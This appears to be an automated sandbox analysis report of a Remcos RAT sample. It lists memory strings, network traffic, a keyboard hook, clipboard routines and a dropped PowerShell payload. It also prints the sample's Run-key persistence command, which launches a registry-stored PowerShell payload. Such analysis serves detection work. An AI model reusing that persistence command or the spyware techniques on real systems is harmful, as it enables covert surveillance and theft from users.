              Source: chrome.exe, 00000008.00000002.144259734548.000012AC00804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144255805494.000012AC000B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/translate_ranker_20180123
              Source: chrome.exe, 00000008.00000002.144259430093.000012AC007B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.guitarcenter.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.harborfreight.com/checkout/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hmhco.com/hmhstorefront/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.homedepot.com/mycart/home
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.homesquare.com/Checkout/Cart.aspx
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hottopic.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hsn.com/checkout/bag
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ikea.com/us/en/shoppingcart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jcpenney.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jcrew.com/checkout/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.joann.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.kohls.com/checkout/shopping_cart.jsp
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.landsend.com/shopping-bag/
              Source: chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.lowes.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.lulus.com/checkout/bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.macys.com/my-bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.midwayusa.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.neimanmarcus.com/checkout/cart.jsp
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nike.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nordstrom.com/shopping-bag
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.officedepot.com/cart/shoppingCart.do
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.opticsplanet.com/checkout/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.otterbox.com/en-us/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.overstock.com/cart
              Source: chrome.exe, 00000008.00000002.144260042929.000012AC008A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pacsun.com/on/demandware.store/Sites-pacsun-Site/default/Cart-Show
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.petsmart.com/cart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pier1.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pokemoncenter.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.potterybarn.com/shoppingcart/
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.privacysandbox.comb
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qvc.com/checkout/cart.html
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.redbubble.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rei.com/ShoppingCart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.revolve.com/r/ShoppingBag.jsp
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rockauto.com/en/cart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.saksfifthavenue.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.samsclub.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sephora.com/basket
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.shutterfly.com/cart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.staples.com/cc/mmx/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sweetwater.com/store/cart.php
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.talbots.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.target.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.teacherspayteachers.com/Cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.therealreal.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tractorsupply.com/TSCShoppingCartView
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ulta.com/bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.underarmour.com/en-us/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.urbanoutfitters.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.vitalsource.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.walgreens.com/cart/view-ui
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.walmart.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wayfair.com/v/checkout/basket/show
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.weightwatchers.com/us/shop/checkout/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.westelm.com/shoppingcart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wiley.com/en-us/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.williams-sonoma.com/shoppingcart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wish.com/cart
              Source: chrome.exe, 00000008.00000002.144258729862.000012AC00640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
              Source: chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zappos.com/cart
              Source: chrome.exe, 00000008.00000002.144259430093.000012AC007B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zazzle.com/co/cart
              Source: chrome.exe, 00000008.00000002.144259430093.000012AC007B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zennioptical.com/shoppingCart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www2.hm.com/en_us/cart
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60796
              Source: unknownNetwork traffic detected: HTTP traffic on port 64413 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63505
              Source: unknownNetwork traffic detected: HTTP traffic on port 59315 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53091 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60368 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64413
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53091
              Source: unknownNetwork traffic detected: HTTP traffic on port 57983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55810
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59315
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57983
              Source: unknownNetwork traffic detected: HTTP traffic on port 63505 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60368
              Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.11.20:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.200.96:443 -> 192.168.11.20:49768 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.126.29.12:443 -> 192.168.11.20:49785 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.190.135.7:443 -> 192.168.11.20:49786 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405086
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148889275088.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144376861712.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5024, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\rPO3799039985.exeJump to dropped file
              Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 6%
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D6FA0 LdrInitializeThunk,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,4_2_214D6FA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00401806 NtdllDefWindowProc_W,9_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004018C0 NtdllDefWindowProc_W,9_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004016FD NtdllDefWindowProc_A,10_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004017B7 NtdllDefWindowProc_A,10_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00402CAC NtdllDefWindowProc_A,11_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00402D66 NtdllDefWindowProc_A,11_2_00402D66
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
              Source: C:\Users\user\Desktop\rPO3799039985.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_004048C50_2_004048C5
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_004064CB0_2_004064CB
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_00406CA20_2_00406CA2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0326EAC02_2_0326EAC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_032698482_2_03269848
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0326EAB02_2_0326EAB0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0773C9362_2_0773C936
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D12CB4_2_214D12CB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214DB9704_2_214DB970
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_215022494_2_21502249
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D9AB04_2_214D9AB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214EF57B4_2_214EF57B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D9D204_2_214D9D20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214DED884_2_214DED88
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214DEFB74_2_214DEFB7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214E37B04_2_214E37B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DF71944_2_21DF7194
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DEB5C14_2_21DEB5C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044B0409_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0043610D9_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004473109_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044A4909_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040755A9_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0043C5609_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044B6109_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044D6C09_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004476F09_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044B8709_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044081D9_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004149579_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004079EE9_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00407AEB9_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044AA809_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00412AA99_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404B749_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404B039_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044BBD89_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404BE59_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404C769_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00415CFE9_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00416D729_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00446D309_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00446D8B9_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00406E8F9_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040503810_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041208C10_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004050A910_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040511A10_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043C13A10_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004051AB10_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044930010_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040D32210_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A4F010_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043A5AB10_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041363110_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044669010_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A73010_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004398D810_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004498E010_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A88610_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043DA0910_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00438D5E10_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00449ED010_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041FE8310_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00430F5410_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004050C211_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004014AB11_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040513311_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004051A411_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040124611_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040CA4611_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040523511_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004032C811_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040168911_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00402F6011_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 214DB100 appears 33 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 214DA5A6 appears 36 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: rPO3799039985.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@66/149@13/12
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,9_2_004182CE
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,11_2_00410DE1
